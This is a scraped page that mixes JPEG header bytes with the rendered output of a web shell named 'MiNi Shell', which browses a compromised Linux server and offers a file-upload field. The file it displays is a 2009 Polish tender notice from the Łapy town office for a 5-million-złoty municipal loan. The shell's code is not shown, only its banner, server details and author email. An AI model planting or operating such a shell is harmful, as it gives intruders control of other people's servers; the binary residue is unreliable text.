JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/107233-N-2009.html

<p class="kh_header"><b>Łapy: 1. Przedmiotem zamówienia jest usługa udzielenia kredytu długoterminowego w wysokości do kwoty 5.000.000,- zł (słownie: pięć milionów złotych) z przeznaczeniem na sfinansowanie deficytu i zaplanowanych rozchodów budżetu gminy Łapy w 2009 roku.</b><br>
<b>Numer ogłoszenia: 107233 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łapach , ul. gen. Wł. Sikorskiego 24, 18-100 Łapy, woj. podlaskie, tel. 085 7152251, faks 085 7152256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lapy.podlasie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Przedmiotem zamówienia jest usługa udzielenia kredytu długoterminowego w wysokości do kwoty 5.000.000,- zł (słownie: pięć milionów złotych) z przeznaczeniem na sfinansowanie deficytu i zaplanowanych rozchodów budżetu gminy Łapy w 2009 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa udzielenia kredytu długoterminowego w wysokości do kwoty 5.000.000,- zł (słownie: pięć milionów złotych) z przeznaczeniem na sfinansowanie deficytu i zaplanowanych rozchodów budżetu gminy Łapy w 2009 roku.
2. Uruchomienie kredytu nastąpi w transzach na rachunek podstawowy Gminy. Wysokość i termin przekazania środków będą każdorazowo uzgadniane z Wykonawcą i przedkładane w postaci wniosku na 3 dni przed uruchomieniem transzy.
3. Całkowite uruchomienie kredytu nastąpi do dnia 28 grudnia 2009 roku.
4. Spłata kredytu następować będzie do 20 każdego miesiąca: od 20 kwietnia 2010 r. do 20 maja 2014 r. po 100.000,- zł. Odsetki płatne będą w ratach miesięcznych na 20 każdego miesiąca. Harmonogram spłaty kredytu zaprezentowano poniżej:

20.04.2010	100 000,00
20.05.2010	100 000,00
20.06.2010	100 000,00
20.07.2010	100 000,00
20.08.2010	100 000,00
20.09.2010	100 000,00
20.10.2010	100 000,00
20.11.2010	100 000,00
20.12.2010	100 000,00
20.01.2011	100 000,00
20.02.2011	100 000,00
20.03.2011	100 000,00
20.04.2011	100 000,00
20.05.2011	100 000,00
20.06.2011	100 000,00
20.07.2011	100 000,00
20.08.2011	100 000,00
20.09.2011	100 000,00
20.10.2011	100 000,00
20.11.2011	100 000,00
20.12.2011	100 000,00
20.01.2012	100 000,00
20.02.2012	100 000,00
20.03.2012	100 000,00
20.04.2012	100 000,00
20.05.2012	100 000,00
20.06.2012	100 000,00
20.07.2012	100 000,00
20.08.2012	100 000,00
20.09.2012	100 000,00
20.10.2012	100 000,00
20.11.2012	100 000,00
20.12.2012	100 000,00
20.01.2013	100 000,00
20.02.2013	100 000,00
20.03.2013	100 000,00
20.04.2013	100 000,00
20.05.2013	100 000,00
20.06.2013	100 000,00
20.07.2013	100 000,00
20.08.2013	100 000,00
20.09.2013	100 000,00
20.10.2013	100 000,00
20.11.2013	100 000,00
20.12.2013	100 000,00
20.01.2014	100 000,00
20.02.2014	100 000,00
20.03.2014	100 000,00
20.04.2014	100 000,00
20.05.2014	100 000,00
5. Zabezpieczeniem kredytu będzie weksel własny in blanco, przekazany Wykonawcy wraz z deklaracją wekslową.
6. Prowizja od uruchomienia kredytu będzie płatna w dniu uruchomienia transzy, w wysokości określonej w ofercie, naliczona od kwoty przelanej transzy kredytu.
7. Kredyt nie może być obciążony innymi opłatami niż prowizja od uruchomienia kredytu oraz oprocentowanie kredytu.
8. Zakłada się możliwość wcześniejszych (przed ustalonym terminem) spłat rat kredytu bez ponoszenia dodatkowych opłat i konieczności informowania Wykonawcy (banku) o tym fakcie.
9. W sytuacji wcześniejszej spłaty kredytu odsetki liczone będą do dnia spłaty kredytu, a nie do dnia końca okresu umowy.
10. Odsetki od kredytu naliczane będą tylko od kwoty aktualnego rzeczywistego zadłużenia.
11. Oprocentowanie kredytu oparte będzie o stawkę WIBOR 1M i dodatnią lub ujemną marżę banku.
12. Stawka WIBOR 1M przyjęta w umowie kredytowej notowana będzie na dwa dni robocze przed podpisaniem umowy kredytu, a w kolejnych miesiącach notowana będzie na dwa dni robocze przed rozpoczęciem kolejnych okresów jednomiesięcznych. Oprocentowanie będzie więc stałe w okresach jednomiesięcznych.
13. Termin realizacji: Postawienie kredytu do dyspozycji zamawiającego w dniu podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczania oferty wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenia zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki 
    określone w art. 22 ust. 1 ustawy, czyli:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
    ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
    technicznym i osobami zdolnymi do wy?konania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonania zamówienia,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art.
    24 ustawy,
e) działają na podstawie ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz.U. z 
    2002 r. Nr 72, poz. 665 z późn. zm.)
2. 
3. Sposób dokonywania oceny spełniania warunków udziału w postępowaniu.
a) Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg 
   formuły: spełnia - nie spełnia.
b) W toku oceny spełniania warunków udziału w postępowaniu, Zamawiający, o ile 
    zajdzie taka potrzeba:
- wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez 
   Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1,
   lub, którzy nie złożyli pełnomocnictw, albo, którzy złożyli wymagane przez 
   Zamawiającego  oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, 
   zawierające błędy lub, którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w 
   wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega 
   odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na 
   wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać 
   spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie 
   przez oferowane roboty wymagań określonych przez Zamawiającego, nie później 
   niż w dniu, w którym upłynął termin składania ofert;
- wezwie Wykonawców, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień 
   dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust 1 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków udziału w postępowaniu należy załączyć:
a) Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt
    1 - 4 ustawy - zał. nr 2 do oferty.
2. Na potwierdzenie, że Wykonawca posiada uprawnienie do wykonywania określonej 
   działalności lub czynności oraz nie podlega wykluczeniu z postępowania należy 
   załączyć:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
   ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
   rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 
   wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
    właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
    Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie 
    zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i 
    społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, 
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
    wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 
    miesiące przed upływem terminu składania ofert, 
c) zezwolenie na utworzenie i rozpoczęcie przez bank działalności wynikające z 
   ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz.U. z 2002 r. Nr 72, poz. 665 
   z późn. zm.) - dotyczy banków utworzonych po 1 stycznia 1998 r. (zezwolenie 
   uprawniające do wykonywania czynności bankowych),
d) aktualną informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
    ust. 1 pkt. 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem
    terminu składania ofert.
e) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24
     ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem
      terminu składania ofert.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
    Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale 9 pkt.
    2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub 
    miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokumenty powinny być 
   wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
  zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub 
  rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
  właściwego organu - dokumenty powinny być wystawione nie wcześniej niż 3 
  miesięcy przed terminem składania ofert,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokumenty 
  powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania 
  ofert,
- składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju 
  pochodzenia  albo zamieszkania osoby, której dokumenty dotyczą w zakresie 
  określonym w art. 24 ust. 1 pkt 4-8 ustawy.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę 
  lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2 
  zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
  notariuszem, właściwym organem sądowym, administracyjnym albo organem 
  samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby
  lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawione 
  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność 
   z oryginałem przez Wykonawcę lub notariusza.

Informacja dotycząca oferty składanej przez kilka podmiotów występujących wspólnie

1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcjum,
    spółka cywilna). W takim przypadku ich oferta musi spełniać następujące 
    wymagania:
a) w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z 
    Wykonawców wchodzący w skład konsorcjum oddzielnie musi udokumentować, że
    nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 ustawy,
c) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich 
    Wykonawców występujących wspólnie,
d) wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do 
   reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia 
   publicznego. Umocowanie może wynikać z treści umowy konsorcjum lub zostać 
   przedłożone oddzielnie wraz z ofertą,
e) treść pełnomocnictwa, o którym mowa w pkt. 1 lit. d) powinna dokładnie określać 
   zakres umocowania, pełnomocnictwo podlega opłacie skarbowej, 
f) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z 
   pełnomocnikiem (liderem),
g) wypełniając druk /oferta/ - załącznik nr 1 do SIWZ, jak również inne dokumenty 
   powołujące się na Wykonawcę, w miejscu np. /nazwa i adres Wykonawcy / należy
   wpisać dane dotyczące konsorcjum lub pełnomocnika konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lapy.podlasie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łapach, 18-100 Łapy, ul Gen. Wł. Sikorskiego 24, pok. 201, II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Urząd Miejski w Łapach, ul. Gen. Wł. Sikorskiego 24, 18-100 Łapy, sekretariat - pok. 103
I piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com